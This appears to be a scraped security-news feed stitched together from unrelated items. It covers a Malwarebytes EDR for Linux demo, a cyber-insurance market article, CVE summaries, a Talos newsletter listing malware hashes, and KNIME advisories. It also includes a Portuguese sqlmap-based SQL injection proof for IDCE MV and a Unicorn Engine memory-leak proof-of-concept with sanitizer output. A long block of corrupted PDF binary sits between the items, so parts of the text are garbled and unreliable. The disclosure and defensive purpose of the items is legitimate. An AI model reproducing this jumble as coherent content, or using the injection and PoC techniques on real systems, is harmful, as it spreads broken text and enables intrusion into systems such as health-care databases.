Our new EDR for Linux offering extends our advanced protection and response capabilities to Linux devices via Nebula and OneView. 
The post Introducing EDR for Linux: Remediating and isolating threats on Linux servers appeared first on Malwarebytes Labs.

We’re excited to announce our new EDR for Linux offering, which extends our advanced protection and response capabilities to Linux devices via Nebula and OneView.

In this post, we show you what remediating and isolating threats on Linux servers looks like with Malwarebytes EDR for Linux.

Let’s get started!

****Table of Contents****

*   Part 1: Downloading the test tool
*   Part 2: Remediating endpoints
*   Part 3: Endpoint isolation
*   Part 4: Removing endpoint isolation

Malwarebytes EDR for Linux provides a test tool to trigger suspicious activity.

Executing a shell script named **trigger.sh**, we downloaded Ncat from a Github repository and stored it in a temporary folder. We then ran Ncat from the temporary folder, trying to manipulate SSH authorized keys.

We can see that Ncat is now in our temporary folder.

Let’s head back to Nebula and check the “**Suspicious activities**” tab. At the top, we’ll see that on our **DB-demo-2** endpoint, Ncat in our temporary folder is being flagged as suspicious.

You might be wondering though: why exactly is running Ncat from a temporary folder considered suspicious? To find the reason, we can click on the **/TMP/NCAT** alert and see what detection rule was triggered.

As you can see above, we find that the technique triggered is **Command and Scripting Interpreter**. The attempt to execute a process from the temp folder – which gives full privileges – has been detected.

We can learn more about this particular adversary behavior, as well as which groups leverage these sorts of attacks, by clicking on the “**T1059 – Command Scripting and Interpreter**” link. This takes us to a MITRE ATT&CK page on the topic.

Now, it’s time to remediate the threat!

Going back to the “**Suspicious Activity”** tab, we can bulk select the threats we want to remediate. Under the “**Bulk Actions**” tab on the upper-right, a drop-down menu appears with a “**Remediate**” option.

The remediation process takes about one to two minutes to complete. We can check on the status of our remediation by going to the “**Tasks**” tab and clicking on the threat, as shown below.

Let’s confirm by checking back on our temp folder. As you can see, Ncat has been removed by our remediation engine.

**Part 3: Endpoint isolation**

We can isolate an endpoint by going over to the “**Endpoints**” tab. After selecting the machine we wish to isolate, we go under the “Actions” tab in the upper-right, a drop-down menu appears with a “**Isolate Endpoint(s)**” option.

We’re given the option to toggle either “**Block network connections**” or “**Block Processes’**‘ for this device. For this example, we only want to do network isolation.

This blocks the endpoint from all outbound and inbound communication – except trusted communication, such as with Nebula servers or OpenVPN. And, as you see below, we are disconnected from the endpoint and no longer able to ping it.

**Part 4: Removing endpoint isolation**

While we are no longer able to connect to the machine, we are still able to manage it. Going back to the “**Endpoints**” tab, we’re able to see the status of our device by clicking on it and going to “**Tasks**”.

We see that the “Isolating Endpoint” task is successful. To remove the isolation, we start by clicking the lock icon in the upper-right corner, which will prompt a “**Remove Isolation**” button.

When we refresh the page, our “**Remove Endpoint Isolation**” task appears with a pending status. Again, give this another minute to resolve to complete.

Now, we have reestablished a connection with the endpoint and can ping it.

Learn more about Malwarebytes EDR for Linux.

Introducing EDR for Linux: Remediating and isolating threats on Linux servers

As insurers and brokers reckon with unexpected losses, they're charging more for policies and setting higher requirements.

Chaos reigns in the cyber insurance market. Brokers and cyber insurance carriers — the companies that actually offer the policies — are tightening requirements on what applicants need to do to obtain policies due to losses the insurers have suffered from ransomware coverage. During the past year, premiums grew 18% in the first quarter of 2021 and were up 34% in the fourth quarter of 2021, according to Jess Burn, senior analyst at Forrester. .

Organizations often find they cannot obtain cyber insurance, are not being renewed for coverage they already have, or are faced with soaring prices and shrinking coverage. Despite the value many organizations put on cyber insurance — in some cases, they're required to carry it to comply with regulations — obtaining such policies is getting more difficult.

While raising premiums, some insurers are reducing coverage. If an organization bought $10 million worth of coverage for a given price in 2021, for example, renewing that policy in 2022 might see the coverage amount fall to $3 million and the premiums for that lower coverage rise. This phenomenon is due, in part, to insurers trying to strike the right balance of customers' risk profile versus their risk-mitigation efforts.

In the recently released "2022 Voice of the CISO" report from Proofpoint, just 49% of CISOs at US-based organizations said they have cyber insurance and are confident that it will be there when needed. This is well below the 58% global average; Canada led the study at 88%, whereas the US ranked 11th worldwide. In that same report, 56% of global CISOs specifically cited the increase of ransomware attacks as a main driver of concern and a key reason to obtain cyber insurance.

**Losses Are Wreaking Havoc**

This situation was underscored in a March 2022 cyber insurance event, sponsored by cybersecurity vendor Sophos, called "Optimizing Your Cyber Insurance Position," where Marsh McLennan Agency (MMA) risk management consultant Marc Schein, national co-chair of the Cyber Center of Excellence, laid out why cyber insurers are revising their requirements for applicants and why their models needed to change.

Schein said the global average associated with ransomware recovery for 2021 was expected to reach roughly $20 billion. The frequency and severity of attacks are increasing, he said, and "insurers' rating models did not accurately predict some of the loss severity that they've actually been seeing \[with\] evolving privacy regulation."

Additionally, increasing regulatory fines and penalties "really have started to wreak havoc on the cyber insurance marketplace," Schein said.

The industry is seeing "increasing conservative limit deployment from certain carriers in response to an increase in volatility from large losses and deteriorating financial performance," he added. "They're not only raising prices, but they're also now starting to change the way that the coverage is structured."

Scott Godes, a partner with law firm Barnes & Thornburg, is a cyber insurance specialist. He agrees that major changes are occurring, noting that some carriers are implementing new exclusions and limitations on the types of coverage policyholders need the most. Nearly all carriers are raising their rates across the board.

"Carriers are getting significantly more aggressive on their claim positions," Godes says. "They are using outside counsel much more frequently to investigate, handle, and adjust claims. It seems very unlikely that carriers hire lawyers to adjust claims to give the most coverage possible to their insureds."

Insurers are finding that assumptions they made about potential losses, based on their experience with other insurance policies such as personal and property liability, are not accurate. Losses have been much higher on some cyber insurance policies over the past several years than insurers anticipated five years ago.

An August 2021 article in Canadian Underwriter highlighted the financial effect some of these assumptions are having on insurance companies' bottom line. "In cyber liability, total net premiums earned for the second half of 2021 were $94.15 million – $12.15 million from Canadian insurers and $82 million from foreign insurers," it reported. "But total net claims incurred (not including reinsurers' share but including adjustment expenses) were $106.26 million ($97.4 million from foreign insurers and $8.86 million from Canadian insurers), for a loss ratio of nearly 113%."

**Setting Baseline Security Controls**

Insurance brokers and carriers are responding to the higher losses from ransomware and unexpected costs by modifying how and to whom they write policies.

Insurers are beginning to require certain security controls be in place prior to sitting down with a prospect to discuss cyber insurance.

"What cyber insurance brokers and carriers want to see from policyholders is a real effort and investment made to reduce the likelihood of a ransomware attack and to be prepared to respond to one should it happen," Forrester's Burn says.

To that end, she recommends that organizations put the following controls in place immediately:

*   Securing Remote Desktop Protocol (RDP) and other remote access configurations.
*   Restricting macros from executing when downloaded from the Internet.
*   Establishing an incident response plan — companies must have playbooks for common attack scenarios like ransomware and business email compromises, and they must test those plans and playbooks regularly with tabletop exercises and crisis simulations.
*   Implementing multifactor authentication.
*   Implementing an offsite backup solution.

MMA's list of controls includes the above, plus the following:

*   Employee cybersecurity training.
*   Third-party risk management (TPRM).
*   Patch management.
*   Vulnerability management.
*   Endpoint detection and response (EDR) and managed detection and response (MDR).
*   Logging and monitoring.
*   End-of-life plan.
*   Email filtering.
*   Privileged access management (PAM).

TPRM is often poorly understood, since organizations have a difficult time determining the risks associated with their supply chains. It is even more difficult to determine the risk of a supply chain's supply chain.

Burn says she expects to see a new, focused breed of cyber insurance policies in the next 12 months to 18 months to cover the weakest link in the supply chain. What those policies will cover is still unwritten.

Turbulent Cyber Insurance Market Sees Rising Prices and Sinking Coverage

Uncontrolled resource consumption in Mattermost version 6.6.0 and earlier allows an authenticated attacker to crash the server via a crafted SVG attachment on a post.

CVE-2022-1982: Security Updates

By Jon Munshaw. 
Welcome to this week’s edition of the Threat Source newsletter. 
Many of you readers may be gearing up for a West Coast swing over the next few weeks through San Francisco and Las Vegas for RSA and Cisco Live, respectively. And we’re right behind you!  
Talos...


[[ This is only the beginning! Please visit the blog for the complete entry ]]

_By Jon Munshaw._ 

Welcome to this week’s edition of the Threat Source newsletter. 

Many of you readers may be gearing up for a West Coast swing over the next few weeks through San Francisco and Las Vegas for RSA and Cisco Live, respectively. And we’re right behind you!  

Talos will have plenty of representation at both conferences, including giving lightning talks at the Cisco Secure booth, several features talks and spots, live podcast recordings, and more. To get you ready for RSA, I wanted to highlight a few special things we’re doing at the conference you should know about before you go.  

As always, you can keep posted on our latest plans and talk schedule by following us on Twitter. 

**Main booth** 

Stop by the main Talos and Cisco Secure booth at Moscone North Hall to say hi, ask questions and get the latest information on what we’re up to. 

At the booth, we’ll be premiering a new video series and giving out some of our newest stickers created in the image of our favorite malware “mascots.” Everyone will be jealous if you have one of these on your laptop. 

**Evolving Your Defense: Making Heads or Tails of Threat Actor Trends** 

Nick Biasini and Pierre Cadieux are hosting our sponsored session on June 7 at 9:40 a.m. PT. In this talk, they’ll be breaking down the latest threat actor tactics, techniques and procedures and telling you which ones you should be worried about and what can be ignored. 

**Beers with Talos/Security Stories** 

We’re hosting two live podcasts back-to-back at the Marriott Marquis: Sierra C ballroom from 2 – 5 p.m. PT on June 7. Security Stories and Beers with Talos are getting together to play a game of “Would I lie to you?”  

Talos’ vice president, Matt Watchinski, will be on hand for both episodes, along with other special guests.  

The Beers with Talos episode will cover Talos’ work in Ukraine, and we’ll hear from the audience about their hottest security takes.  

**The one big thing **

A recently discovered zero-day vulnerability in the Microsoft Windows Support Diagnostic Tool (MSDT) made headlines over the past few days. CVE-2022-30190, also known under the name "Follina," exists when MSDT is called using the URL protocol from an application, such as Microsoft Office, Microsoft Word or via an RTF file. An attacker could exploit this vulnerability to gain the ability to run arbitrary code on the targeted system. 

  

> **Why do I care? **
> 
> If an attacker were to successfully exploit this vulnerability, they could execute remote code on the targeted machine. Needless to say, that’s bad. This is just the latest in a string of Microsoft vulnerabilities to make headlines over the past 12 months, including PrintNightmare and multiple Exchange Server issues. If those cases have taught us anything, it’s that attackers aren’t afraid to look for vulnerable Microsoft products to try and gain a foothold on a targeted network or machine.  
> 
> **So now what? **Although a patch hasn't been released yet, Microsoft has provided workarounds and Windows Defender protections for the CVE and malware exploiting this vulnerability. Cisco Talos has also released coverage to protect against this vulnerability, including multiple Snort rules and a ClamAV signature.   

**Other news of note**

Costa Rica’s government was hit with another ransomware attack, this time from the Hive group. Hive took down the country’s health department’s online services earlier this week, adding to the problems Costa Rica is facing after Conti launched a ransomware attack in May. Security experts say there is evidence that Conti and Hive may be working together to extort the Costa Rican government. This is all going on as the Conti group claims it’s shutting down and splitting up into smaller groups. The Hive operators have not yet declared a ransom amount. (Bleeping Computer, Krebs on Security, CSO Online) 

The U.S. Department of Justice seized three domains associated with selling and collecting stolen and leaked personal information. Authorities said the sites, WeLeakInfo, IPStress and OVH Booster all assisted attackers in carrying out denial-of-service attacks. In 2020, the DoJ seized very similar domains, including “weleakinfo.com,” which at the time, offered users the ability to “review and obtain the personal information illegally obtained in over 10,000 data breaches.” (Recorded Future, Department of Justice) 

The FBI recently thwarted an attempted cyber attack on a Boston children’s hospital, according to the agency’s director. Chris Wray, speaking at an event in Boston, received intelligence last summer ahead of time that allowed the agency to stop what he called “one of the most despicable cyberattacks I've seen.” Wray added that the attack came from an Iranian state-sponsored actor. The same hospital faced similar attacks in 2014 and 2019, he said. (ABC News, NBC 10 Boston) 

**Can’t get enough Talos? **

*   Researcher Spotlight: Martin Lee, EMEAR lead, Talos Strategic Communications
*   Threat Roundup for May 20 - 27
*   Talos Takes Ep. #98: Maybe don't panic about that F5 BIG-IP vulnerability

  

**Upcoming events where you can find Talos ****REcon (June 3 – 5, 2022)  
Montreal, Canada ****RSA 2022 (June 6 – 9, 2022)  
San Francisco, California ****Cisco Live U.S. (June 12 – 16, 2022)  
Las Vegas, Nevada ****Most prevalent malware files from Talos telemetry over the past week  **

**SHA 256:** e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  **MD5:** 93fefc3e88ffb78abb36365fa5cf857c  **Typical Filename:** Wextract    
**Claimed Product:** Internet Explorer    
**Detection Name:** PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg  

**SHA 256:** 125e12c8045689bb2a5dcad6fa2644847156dec8b533ee8a3653b432f8fd5645    **MD5:** 2c8ea737a232fd03ab80db672d50a17a    **Typical Filename:** LwssPlayer.scr      
**Claimed Product:** 梦想之巅幻灯播放器      
**Detection Name:** Auto.125E12.241442.in02    

**SHA 256:** 4b34e3637fa7af93ab628ae5adad2c7f3464053316963297844324a4f649a206   
**MD5:** 3632f27604f5a82cf73b9ade710a1656  **Typical Filename:** mediaget\_installer\_467.exe    
**Claimed Product:** N/A    
**Detection Name:** FileRepPup:MediaGet-tpd  

**SHA 256:** a9f7d7525aad1c7007ae9d1d3fc531a1065b28225c5b7efb7347aaf77d9aba92    
**MD5:** 8f90e544a48d75f42f9d44811320689c   **Typical Filename:** tata communications wholesale retai lpak ncl ethopia napal spice srilanka bd cli bangladesh.wsf    
**Claimed Product:** N/A     
**Detection Name:** Xml.Dropper.Valyria::100.sbx.vioc  

**SHA 256:** 85B936960FBE5100C170B777E1647CE9F0F01E3AB9742DFC23F37CB0825B30B5   **MD5:** 8c80dd97c37525927c1e549cb59bcbf3   **Typical Filename:** Eternalblue-2.2.0.exe     
**Claimed Product:** N/A     
**Detection Name:** Win.Exploit.Shadowbrokers::5A5226262.auto.talos

Threat Source newsletter (June 2, 2022) — An RSA Conference primer

libdwarf 0.4.0 has a heap-based buffer over-read in _dwarf_check_string_valid in dwarf_util.c.

CVE-2022-32200: DA's Libdwarf Vulnerabilities

In KNIME Analytics Platform below 4.6.0, the Windows installer sets improper filesystem permissions.

This page summarizes all security advisories for KNIME Software products and services, including KNIME Analytics Platform, KNIME Server, and KNIME Hub.

Please note that the CVSS Score is an indication of the potential _severity_ of the issue but not the _risk_. The actual risk needs to be assessed by every user individually because there may be circumstances where a high severity issue is not applicable and therefore does not pose a risk (and vice-versa).

If you want to know more about the CVSS Score, have a look at the resources provided by the Common Vulnerability Scoring System SIG.

**CVE-2022-31500 - Windows installer for KNIME Analytics Platform allows for privilege escalation**

*   Published: 2022-05-24
*   Affected Product: KNIME Analytics Platform before 4.6.0
*   Base CVSS Score: 8.2
*   Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H/E:F/RL:T/RC:X/CR:L/IR:L/AR:L/MAV:L/MAC:L/MPR:N/MUI:R/MS:C/MC:H/MI:H/MA:H

The installer for KNIME Analytics Platform on Windows before 4.6.0 makes the installation directory writeable to everyone on the system. This is useful so that the user can update or install extensions from a running KNIME Analytics Platform without having to restart the application as administrator. However, this also allows other authenticated local users on the system to (re)place malicious files in the installation e.g. replacing the uninstall program. The latter is run with administration privileges if the application is being uninstalled (by a user with administrative privileges). Starting with KNIME Analytics Platform 4.6.0 the installer will restrict write access to the installation directory to admin users. This also means that in order to update or install additional extensions, KNIME Analytics Platform must first be started with admin privileges.

Note that the KNIME Server installer for Windows, which can create a KNIME Analytics Platform installation used as an executor, is **not** affected.

**Workaround**

Existing installations can be "fixed" by restricting the permissions of the installation folder manually. If you use the self-extracting archive or the ZIP file the default permissions on Windows apply, which usually means that only the extracting user has write permissions on the installation directory. In this case update or installation of extensions is possible without starting KNIME Analytics Platform as admin user.

The vulnerability was found and reported by Łukasz Rupala & Przemysław Mazurek.

**CVE-2021-45096 - External XML Entity Injection with specially crafted workflow files**

*   Published: 2021-12-16
*   Affected Product: KNIME Analytics Platform before 4.5.0
*   Base CVSS Score: 4.3
*   Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

KNIME Analytics Platform before 4.5.0 with resolve external entities in workflow.knime files when loading a workflow. Using a specially crafted workflow file, potentially sensitive information such as Windows network password hashes maybe leaked _to_ a remote system. It can not be used to leak information _from_ a remote system e.g. when a workflow is loaded on KNIME Server.

The vulnerability was found and reported by Dawid Czarnecki from NATO.

****CVE-2021-45097 -** Server installer does not restrict permission on auto-install.xml**

*   Published: 2021-12-16
*   Affected Product: KNIME Server before 4.12.6 and 4.13.x before 4.13.4
*   Base CVSS Score: 2.9
*   Vector: CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N

KNIME Server before 4.12.6 and 4.13.x before 4.13.4 (when installed in unattended mode) keeps the administrator's password in a file without appropriate file access controls, allowing all local users to read its content.

The vulnerability was found and reported by Dawid Czarnecki from NATO.

**CVE-2021-44725 - Directory path traversal when requesting client profiles**

*   Published: 2021-12-07
*   Affected Product: KNIME Server between 4.7.0 and below 4.11.6, 4.12.5, 4.13.4, respectively
*   Base CVSS Score: 7.5
*   Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

The server managed customizations functionality of KNIME Server starting at version 4.7.0 is vulnerable to Directory Path Traversal attacks. By manipulating variables that reference files by prepending “dot-dot-slash (../)” sequences and their variations or by using absolute file paths, it is possible to access arbitrary files and directories stored on the file system including application source code, configuration, and database. Due to the file-based architecture of KNIME Server, this vulnerability allows stealing users' data  
such as password hashes, workflows, licenses, jobs, and so on. No authentication is required to exploit this vulnerability.

The issue is fixed in KNIME Server 4.13.4, 4.12.5, and 4.11.6 which have been released today. All customers are advised to update their server's immediately.

**Workaround**

If you cannot update right away you can apply the following workaround which prevents access to client profiles for any user:

1.  Locate _<apache-tomcat>/webapps/knime/WEB-INF/web.xml_
2.  Edit the file and add the following block before the existing line <deny-uncovered-http-methods /> at the bottom of the file:
    
       ...
       <security-constraint>
          <web-resource-collection>
             <web-resource-name>Profiles
             <url-pattern>/rest/v4/profiles/contents
          </web-resource-collection>
          <auth-constraint />
       </security-constraint>
    
       <deny-uncovered-http-methods />
    </web-app>
    
3.  Restart KNIME Server.

The vulnerability was found and reported by Dawid Czarnecki from NATO.

**CVE-2021-44726 - Cross-Site-Scripting vulnerability in old WebPortal login**

*   Published: 2021-12-07
*   Affected Product: KNIME Server below 4.13.4
*   Base CVSS Score: 8.8
*   Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:L

The old KNIME WebPortal login page up to version 4.13.3 contains a DOM-based XSS vulnerability that once exploited, can be used to run any action as a victim user via malicious JavaScript. If the victim user is an administrator, it could be used to create a new administrator. To exploit the vulnerability it is required to create a specially crafted URL and convince the victim to open it. No authentication is required to exploit the vulnerability, however, authenticated users can be targeted.

The vulnerability was found and reported by Dawid Czarnecki from NATO

CVE-2022-31500: Security Advisories | KNIME

Incorrect Default Permissions vulnerability in ABB e-Design allows attacker to install malicious software executing with SYSTEM permissions violating confidentiality, integrity, and availability of the target machine.

%PDF-1.7 %���� 1 0 obj <>/Metadata 462 0 R/ViewerPreferences 463 0 R>> endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/Font<>/ProcSet\[/PDF/Text/ImageB/ImageC/ImageI\] >>/MediaBox\[ 0 0 595.32 842.04\] /Contents 4 0 R/Group<>/Tabs/S/StructParents 0>> endobj 4 0 obj <> stream x��\[Ko#�������~?a�Imx;+ �y-+{���0����{���99#x��!���ꫪ��G�����������v8>���������\_�������������������=�K}|���\[�w��\]����wO�������� ��ĝD@P�0Aݷ����{��BF:�m ���\`���JEp������������/�O�C"��.�@z5���K�����{}�ꤹ|����;�q$����{- vOV�V�>\\\_�|���A��I�o�4��~C�e���y�̗���?����"� �F�K�Zb�oL�����t���:h�z�&q�ID P�&�־뾿D\\Ŧ�ʶ8�At0\[��7�h#���eo0.��T߇�w C8\[�h�؃V��. �$��J@8hC18P)��K�Қ��F�� �WCc�Xb� 2j���\\9�.k���'����4 #�V��T�7�Z +� \*IB�h����z�� '�K$��'��\[^��%b��D���\*% �$������U/�H)�ҁ��>j� ��/���m.z��r�\\t�$IP���2Βlʧ��ļzd2�˪���MIU��}e�?�2\_aK�FBZ��6�����"k@+M��J��k-�7wm�!�B���W-�z��y�q��������\_���4\[�n7�;W;$���R��������\\#U��Ϛ4%��H�8�!P����06��(.�(n�텥��?�E-�����Y��M���K�K(g���R�2���a0�� ��n���S��)���fow�w�Cts�b�"�.���ݷ���?/#ⴢ�$�x�Wcj��F�<��r�|�7�hV9�4i� �k�H���ôۖӧ�0,r�t�p~Q ��l���8P�-�������G�o��0��q@�2;�q�m+&��n0�X�J�@�{e&MN�Jrl���T7�,|���G��Q���x����T�Y��g��ň���s\`m�.��6C���U6)t=��\]�D�U��5�ND�E �4�����@�V�;����\`���'��9Mi�43x��bۡ ��N�j�Sc�k؃pM�O@��M��Ĝk�E�k�\]�!�d�N���;t��pٔ��'չ��HX�4S+�r��j(Zj�K~�"�D�$�5mp=\[Kq.qOM<���%��tU�(me�K���J��RU��{�L�mӞ��G��r�:/MX5�0ְc�A\]�{��5�\`��^�\\���a���+� ��kl� e��)�1���1�/���\`q^���jh7���}S1� X��=�/�PK��$7gxo��9@�Ͳ�0�� ���Y:�1�4X"L��EG����8�uw�����L����F�=Y 4T֡�Zi��i?}}xu�������7n�?Oq6U��u������yj�&�0ᦓ�XP�C��7��SH�c�ΰ���P�\[C7�q�ip0�ޯ����O��I�=�4��bw �EiOrGyݪ����kjVU�l\\, B���8h@�LV@�����5p�"wJ窶�7�h�~�+�Ul&L,l/�n0��P�|�4\_��\`��wx��|g�V�9(;�βpT6�# �ס�9�EP&����p{�i�&VA�(=���Ɓ¼9��M�MT������\*ڠ�� \`<(���ETq�WF:=/�+��\\���|�a��H�<�gƯt��h+b���\`���pM���s�8,y��P�h���Z�Nh?�̧�L��<����KS�� ND�ʘ,�$�� �(��"ʳT��1FY0�(��\[L�䜚m����z!�0^�"azA��٨4/��$�'Y�f;��=\]�1�˒V�5e=��FS�LD�V{�(�!�ǜ6�e��i|�h?��@w-�-r���i���Q��A(�JJ�D(���Xy;�� �H�O�ѕ�3of�������Z�%��\[/�����uqT��Z���)�����OQ=���8��c�q��<1��8-��k!�r8M��=aE#��IY#D����4|�(�B���x� 1�1tT�>-��h�Dcd��K8Ꟊi�!u�ј"���)�M�&t�\]��b<-�~%2�9)�� oN�$oJ��>kL�YI4������ݙs\` ����O��x��k��4O�ѸRD��hLl�.�Ѕ��RN���>���,��ss嫷O2D�I2�z���N��\*44��e�S�D��6�|��m�I��PJz�\*�Y� ��ou�Rx��ǎ\_kJuҒ��Yp��̙~�E�27�I��d�K���\*{Hm\`�<֛��?۬T����A҅إ��6�kM@G���خdD���JEC��V��7��X�^�E=�O�1'�޿�9t갫�Z=��wȡ76�ooj�\]��'���-Y�3����<ځI8�3���!U9������.�&v:�+�yi�d�)�;1.kI�G�M�ݟ�8���S�Q��3b9"5��WC���I�T�M�������E�B�-ĭ�1%�a����xr㵙�,�Z+QCT��J� �'���yGk>՚)��X�� ���wDw���nNkPO��h��h���R�q �jɶ��G����1\_�ѷ���Ҍ�P��\[�L5N�v���-�������I5���pv��\\a�'�Ysu<\[}�b�WJ�qK��꫖����ߟ8�\*�K��q����کrQ��cK�S�\`'��<�g���t:��r�w��hr>z�t�ʱ�Xbp��Z��1"\*��F��8/C��J��Y"�N��\\\`�XP�R �Uc@����\*p endstream endobj 5 0 obj <> stream x�m�A�%'E�-��8�l�2��$��A��A�0��#����Wۜ�����������~ʧ

CVE-2022-29483

SQL injection in Logon Page of IDCE MV's application, version 1.0, allows an attacker to inject SQL payloads in the user field, connecting to a database to access enterprise's private and sensitive information.

Olá!

Neste artigo eu comprovo a falha de SQL Injection no software de gestão de saúde IDCE da empresa MV Informática para a base do CVE-2022-30496.

Embora o software seja de uma versão antiga, lançada há alguns anos atrás, algumas empresas brasileiras de saúde ainda o utilizam em larga escala. A maioria das empresas o tem rodando apenas em redes locais ou protegidos por VPN. Porém ainda é possível encontrar este software vulnerável sendo utilizado abertamente através da internet e sem nenhuma proteção extra.

Aproveito para informar que a ação de coletar informações de serviços não é caracterizado crime, uma vez que foi utilizado um ambiente controlado de teste e nenhuma informação privada foi revelada. Esta matéria tem como fins apresentar os métodos utilizados por hackers para encontrar informações de empresas e apresentar aos desenvolvedores as falhas de segurança que suas aplicações web (portais, sites de atendimento, etc) possuem. Corrigir ou não é uma decisão dos desenvolvedores e gestores/clientes destas aplicações.

Por Iran Macedo, especialista em proteção de dados e segurança ofensiva / Pentest.

**A falha de SQLi**

O software testado foi o IDCE - MV Medicina Diagnóstica. Este software é utilizado por hospitais e seus médicos para gerarem laudos de exames médicos de pacientes. Mas não somente isso, pois pode controlar fluxo de pagamentos, gerenciar usuários, suas informações e permissões, dados de parceiros, de fornecedores e de clientes (pacientes) e outros serviços gerenciais relativos aos hospitais e clínicas.

Realizando o teste mais básico de SQL Injection, não conseguimos nada. Por exemplo, ao adicionar uma aspas simples ' no campo usuário, temos a resposta "Usuário e/ou Senha inválidos!", o que parece ser um bom sinal, uma vez que a aplicação parece tratar a entrada enviada pelo usuário antes de envia-la ao banco de dados.

**Time-Based Blind injection**

Para iniciar meus testes, fiz o envio de um usuário e senha inválidos, interceptei pelo Burp, copiei os dados de requisição e salvei num arquivo TXT, que foi utilizado pelo SQLMap como base da requisição através do parâmetro "-r".

Num teste anterior em um outro produto do desenvolvedor MV, vimos que o banco de dados utilizado era um Oracle. Desta forma as chances do desenvolvedor utilizar na epoca o Oracle como a solução de banco de dados para todas as suas aplicações é grande. Partindo deste princípio, configurei o meu SQLMap para testar todas os possíveis ataques (level 5 e risk 3) somente para banco Oracle nesta aplicação. Isso reduz a quantidade e o tempo de execução dos testes.

Como resultado, o campo testado (Usuário) pareceu ser vulnerável a um ataque de SQL Injection em Oracle e Time-Based Blind.

Ao final dos testes o SQLMap trouxe a confirmação da falha de segurança da aplicação, evidenciando o banco de dados encontrado (Oracle), a versão e o sistema operacional do servidor do banco de dados (Windows 2008 R2) e outras informações. Isto já é suficiente para comprovar a falha de segurança na aplicação.

Para ser mais conclusivo, outros dados não sensíveis foram capturados, como por exemplo o usuário utilizado pelo banco de dados e a base atualmente acessada.

E, para evidenciar que seria possível acessar todas as informações dentro desta base, pegamos os nomes das colunas de uma dada tabela utilizada pela aplicação IDCE.

Estas evidências são suficientes para comprovar a falha de segurança da aplicação, que acaba expondo as informações dentro do seu banco de dados.

Por ser um falha baseada em tempo de resposta às cegas (Time-Based Blind), este tipo de ataque pode levar muito tempo para ser executado.

**Correção da falha** _(informação atualizada)_

Conversando por vídeo conferência com o desenvolvedor em maio de 2020 e em junho de 2022, fui informado de que a MV Informática corrigiu as falhas apresentadas nesta versão testada. Desta forma, é recomendado que a solução de medicina diagnóstica IDCE seja utilizada sempre de forma atualizada. Infelizmente algumas empresas ainda utilizam versões desatualizadas e vulneráveis.

**Conclusão**

Mantenha o seu software atualizado e sempre utilize as versões mais atuais e estáveis. Utilizar softwares piratas pode parecer como uma solução viável e barata para quem não quer gastar dinheiro pagando por programas licenciados. Mas lembre-se de que isto não é legal (no termo jurídico da palavra), além de não ter as atualizações necessárias para mantê-lo seguro. O "barato" pode acabar saindo muito, mas muito mais caro do que pagar por softwares licenciados. Visto que uma multa aplicada por processos judiciais de clientes afetados através da LGPD não é nada barato, sem dizer dos riscos de se ter o banco de dados principal invadido.

Mantenha-se seguro e um grande abraço!

Documentação formal do CVE na Mitre: MeuGithub

CVE ID: CVE-2022-30496.

CVE-2022-30496: SQL Injection no IDCE MV

Unicorn Engine v2.0.0-rc7 contains memory leaks caused by an incomplete unicorn engine initialization.

Unicorn 2 provide a new API (uc_ctl) that allows host to modify the architecture and mode of the CPU. However, this api doesn't determine whether the architecture and mode are supported by unicorn. Further more, Unicorn did not judge the result of engine initialization at the design stage.

In other words, if we use unexpected architecture or mode to initialize unicorn engine, unicorn will alloc memory during initialization that will not be released.

NICORN\_EXPORT
uc\_err uc\_close(uc\_engine \*uc)
{
    int i;
    MemoryRegion \*mr;

    if (!uc->init\_done) {
        free(uc);
        return UC\_ERR\_OK;
    }

    // Cleanup internally.
    if (uc->release) {
        uc->release(uc->tcg\_ctx);
    }
   
    // ...
    g\_free(uc->l1\_map);

    free(uc);

    return UC\_ERR\_OK;
}

Although uc->init_done is equal to zero, something is alloced in memory region such as uc->l1_map.

PoC

#define ADDRESS 0x2000
#define SIZE 0x1000
#define MODE 1111

int main(int argc, char \*\*argv) {
    uc\_engine \*uc;
    uc\_err err;
    err = uc\_open(UC\_ARCH\_X86, UC\_MODE\_64, &uc);
    if (err != UC\_ERR\_OK) {
        printf("Failed on uc\_open() with error returned: %u %s\\n", err, uc\_strerror(err));
        return -1;
    }

    err = uc\_ctl(uc, UC\_CTL\_CPU\_MODEL, MODE);
    if (err != UC\_ERR\_OK) {
        printf("Failed on uc\_ctl() with error returned: %u %s\\n", err, uc\_strerror(err));
        return -1;
    }

    err = uc\_mem\_map(uc, ADDRESS, SIZE, UC\_PROT\_ALL);
    if (err != UC\_ERR\_OK) {
        printf("Failed on uc\_mem\_map() with error returned: %u %s\\n", err, uc\_strerror(err));
        //return -1;
    }

    uc\_close(uc);
    return 0;
}

Debug info

$ ./poc\_test
Failed on uc\_mem\_map() with error returned: 20 Insufficient resource (UC\_ERR\_RESOURCE)

=================================================================
==23530==ERROR: LeakSanitizer: detected memory leaks
                                                                                                                           
Direct leak of 65536 byte(s) in 1 object(s) allocated from:
    #0 0x7f0372854037 in \_\_interceptor\_calloc ../../../../src/libsanitizer/asan/asan\_malloc\_linux.cpp:154                  
    #1 0x7f037145bfbc in g\_malloc0 /home/lys/Documents/my/unicorn/glib\_compat/gmem.c:139
    #2 0x7f03714b6a6b in tcg\_exec\_init\_x86\_64 /home/lys/Documents/my/unicorn/qemu/accel/tcg/translate-all.c:1094
    #3 0x7f03714584ba in machine\_initialize /home/lys/Documents/my/unicorn/qemu/softmmu/vl.c:53
    #4 0x7f0371453f55 in uc\_init /home/lys/Documents/my/unicorn/uc.c:214
    #5 0x7f03714556a9 in uc\_mem\_map /home/lys/Documents/my/unicorn/uc.c:1010
    #6 0x5606ff4f335e in main /home/lys/Documents/unitest/poc\_test.c:30
    #7 0x7f0370f1a7ec in \_\_libc\_start\_main ../csu/libc-start.c:332

Direct leak of 42504 byte(s) in 1 object(s) allocated from:
    #0 0x7f0372853e8f in \_\_interceptor\_malloc ../../../../src/libsanitizer/asan/asan\_malloc\_linux.cpp:145                  
    #1 0x7f037145bf4e in g\_malloc /home/lys/Documents/my/unicorn/glib\_compat/gmem.c:93
